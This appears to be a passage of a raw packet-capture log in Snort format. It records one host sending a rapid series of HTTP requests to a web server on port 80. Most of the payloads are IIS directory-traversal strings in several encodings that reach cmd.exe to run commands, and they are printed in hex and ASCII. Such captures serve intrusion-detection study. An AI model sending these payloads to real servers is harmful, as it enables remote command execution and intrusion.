2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.324750 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2106 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:43189 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E19CD  Ack: 0x31FEC423  Win: 0xAA0B  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.324752 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2106 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:43445 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E19CD  Ack: 0x31FA1BA0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.326057 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2107 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:43701 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1957  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.327694 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2107 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:44469 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1958  Ack: 0x3198B139  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.327884 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xAB
137.189.161.199:2107 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:44725 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x372E1958  Ack: 0x3198B139  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E  GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.330644 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2107 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:46005 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E19CD  Ack: 0x3198B32F  Win: 0xAA0B  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.330973 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2107 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:46261 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E19CD  Ack: 0x3198B32F  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.332118 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2110 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:46517 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1967  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.333634 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2110 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:46773 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1968  Ack: 0x31CE0035  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.333830 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xC7
137.189.161.199:2110 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:47029 IpLen:20 DgmLen:185 DF
***AP*** Seq: 0x372E1968  Ack: 0x31CE0035  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 32 35  GET /msadc/..%25
35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 2E  5c../..%255c../.
2E 25 32 35 35 63 2F 2E 2E 25 63 31 25 31 63 2E  .%255c/..%c1%1c.
2E 2F 2E 2E 25 63 31 25 31 63 2E 2E 2F 2E 2E 25  ./..%c1%1c../..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.336585 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2110 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:47797 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E19F9  Ack: 0x31CE023B  Win: 0xA9FB  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.336869 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2110 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:48053 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E19F9  Ack: 0x31CE023B  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.338180 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2113 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:48309 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1967  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.342645 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2113 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:48821 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1968  Ack: 0x312D911D  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.342994 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:2113 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:49589 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372E1968  Ack: 0x312D911D  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.345882 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2113 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:51125 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E19C9  Ack: 0x312D9301  Win: 0xAA1D  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.346211 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2113 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:51637 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E19C9  Ack: 0xC489BD1B  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.347725 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2115 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:51893 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1A17  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.349488 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2115 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:52661 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1A18  Ack: 0x31C3DD31  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.349550 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:2115 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:52917 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372E1A18  Ack: 0x31C3DD31  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 30 25 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c0%2f../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.354728 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2115 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:53173 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1A79  Ack: 0x31C3DF15  Win: 0xAA1D  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.354897 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2115 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:53429 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E1A79  Ack: 0x31C3DF15  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.354899 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2118 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:53941 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E19D2  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.356410 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2118 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:54453 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E19D3  Ack: 0x31220B78  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.356715 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:2118 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:54709 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372E19D3  Ack: 0x31220B78  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 30 25 61 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c0%af../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.359195 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2118 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:54965 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1A34  Ack: 0x31220D5C  Win: 0xAA1D  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.359521 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2118 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:55221 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E1A34  Ack: 0x31220D5C  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.360791 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2121 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:55989 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E19B4  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.362429 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2121 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:56245 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E19B5  Ack: 0x31F23C30  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.362943 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:2121 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:56501 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372E19B5  Ack: 0x31F23C30  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 39 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%9c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.366853 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2121 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:57269 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1A16  Ack: 0x31F23E14  Win: 0xAA1D  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.367019 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2121 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:57525 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E1A16  Ack: 0x31F23E14  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.367508 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2122 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:57781 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E1A27  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.369310 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2122 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:58037 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1A28  Ack: 0x31B33C1B  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.369338 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x98
137.189.161.199:2122 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:58293 IpLen:20 DgmLen:138 DF
***AP*** Seq: 0x372E1A28  Ack: 0x31B33C1B  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74 2F 73  %35%63../winnt/s
79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F  ystem32/cmd.exe?
2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D  /c+dir HTTP/1.0.
0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E  .Host: www..Conn
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..
0D 0A                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.371440 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2122 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:58805 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1A8A  Ack: 0x31B33DF1  Win: 0xAA2B  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.371811 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2122 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:59061 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E1A8A  Ack: 0x31B33DF1  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.373079 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2124 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:59317 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E19F9  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.374717 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2124 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:59573 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E19FA  Ack: 0x31A6D711  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.374780 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:2124 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:59829 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372E19FA  Ack: 0x31A6D711  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
25 33 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  %35c../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.378489 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2124 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:60597 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1A5A  Ack: 0x31A6D8E7  Win: 0xAA2B  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.378492 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2124 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:60853 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E1A5A  Ack: 0x31B33C1B  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.378813 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2125 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:61109 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372E19C1  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.380943 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2125 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:61365 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E19C2  Ack: 0x31704E3D  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.380971 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x9A
137.189.161.199:2125 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:61621 IpLen:20 DgmLen:140 DF
***AP*** Seq: 0x372E19C2  Ack: 0x31704E3D  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74  25%35%63../winnt
2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78  /system32/cmd.ex
65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E  e?/c+dir HTTP/1.
30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F  0..Host: www..Co
6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65  nnnection: close
0D 0A 0D 0A                                      ....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.383569 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2125 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:62133 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372E1A26  Ack: 0x31705022  Win: 0xAA1C  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.383892 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2125 -> 137.189.97.94:80 TCP TTL:125 TOS:0x0 ID:62389 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372E1A26  Ack: 0x31705022  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:51.384919 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
